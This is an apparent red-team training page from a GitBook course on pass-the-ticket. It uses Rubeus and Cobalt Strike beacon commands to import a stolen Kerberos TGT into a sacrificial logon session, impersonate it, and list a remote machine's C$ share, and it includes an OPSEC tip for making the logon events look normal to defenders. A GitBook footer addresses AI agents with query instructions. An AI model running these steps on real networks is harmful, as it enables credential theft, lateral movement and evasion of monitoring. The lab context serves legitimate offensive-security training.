> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/user-impersonation/pass-the-ticket.md). # Pass the Ticket Pass the ticket is a technique that allows you to add Kerberos tickets to an existing logon session (LUID) that you have access to, or a new one you create. Accessing a remote resource will then allow that authentication to happen via Kerberos. For this, we can leverage the TGT we extracted from jking's logon session on Workstation 2. The first step is to create a blank, "sacrificial" logon session that we can pass the TGT into. We do this because a logon session can only hold a single TGT at a time. If we passed jking's TGT into the LUID for bfarmer, it would erase bfarmer's TGT and cause all sorts of authentication issues for the user. Creating a new logon session and passing tickets into sessions other than your own requires elevated privileges. \\ Rubeus' `createnetonly` command will start a new hidden process of our choosing, using the [CreateProcessWithLogonW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithlogonw) API. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe [*] Action: Create Process (/netonly) [*] Using random username and password. [*] Showing process : False [*] Username : GJB9A2GP [*] Domain : VPY1XQRP [*] Password : R4ABN1K3 [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 4748 [+] LUID : 0x798c2c ``` \\ This also creates a new LUID. It will have no tickets inside, so won't be visible with `triage` just yet. The next step is to pass the TGT into this new LUID using the Rubeus `ptt` command. Where the `/luid` is the new LUID we just created and `/ticket` is the base64 encoded ticket we previously extracted. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP [*] Action: Import Ticket [*] Target LUID: 0x798c2c [+] Ticket successfully imported! ``` \\ Rubeus triage will now show jking's TGT inside this LUID. ``` | 0x798c2c | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:29:20 PM | ``` \\ The final step is to impersonate the process that we created with createnetonly using Cobalt Strike's `steal_token` command. At a minimum, this requires the PID of the target process, which in this example, is 4748. We'll then be able to access the remote machine. ``` beacon> steal_token 4748 beacon> ls \\web.dev.cyberbotic.io\c$ [*] Listing: \\web.dev.cyberbotic.io\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 08/15/2022 18:50:13 $Recycle.Bin dir 08/10/2022 04:55:17 $WinREAgent dir 08/10/2022 05:05:53 Boot dir 08/18/2021 23:34:55 Documents and Settings dir 08/19/2021 06:24:49 EFI dir 08/15/2022 18:58:09 inetpub dir 05/08/2021 08:20:24 PerfLogs dir 08/24/2022 11:02:25 Program Files dir 08/10/2022 04:06:16 Program Files (x86) dir 08/31/2022 17:40:32 ProgramData dir 08/15/2022 18:31:08 Recovery dir 08/30/2022 11:16:24 System Volume Information dir 08/30/2022 17:51:08 Users dir 08/30/2022 20:19:27 Windows 427kb fil 08/10/2022 05:00:07 bootmgr 1b fil 05/08/2021 08:14:33 BOOTNXT 12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp 384mb fil 09/01/2022 07:26:41 pagefile.sys ``` \\ As before, use `rev2self` to drop the impersonation. To destroy the logon session we created, simply kill the process with the `kill` command. ``` beacon> rev2self beacon> kill 4748 ``` \\ Rubeus triage will no longer show the logon session. \\ **OPSEC**\ \ By default, Rubeus will use a random username, domain and password with CreateProcessWithLogonW, which will appear in the associated 4624 logon event. The "Suspicious Logon Events" saved search will show 4624's where the *TargetOutboundDomainName* is not an expected value. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/a36/bc1/418/createnetonly-logon.png) \\ We can provide these options on the command line to make the fields appear less anomalous. The password does not have to be the users' actual password. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/user-impersonation/pass-the-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.